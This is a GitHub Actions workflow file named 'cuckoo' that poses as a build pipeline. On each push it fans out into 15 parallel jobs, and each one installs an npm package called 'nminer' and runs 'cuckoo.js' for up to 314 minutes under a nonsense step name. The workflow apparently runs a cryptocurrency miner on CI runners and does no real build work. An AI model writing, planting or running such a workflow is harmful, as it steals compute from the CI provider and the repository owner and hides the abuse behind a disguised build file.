name: cuckoo
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1184 }
          - { version: 3288 }
          - { version: 5149 }
          - { version: 5019 }
          - { version: 7293 }
          - { version: 4518 }
          - { version: 5689 }
          - { version: 1200 }
          - { version: 2370 }
          - { version: 4600 }
          - { version: 1089 }
          - { version: 3243 }
          - { version: 4289 }
          - { version: 8502 }
          - { version: 438 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: though fairly incidentally nor geez
        run: |
          npm install nminer@latest
          timeout 314m node cuckoo.js || echo "cuckoo executed"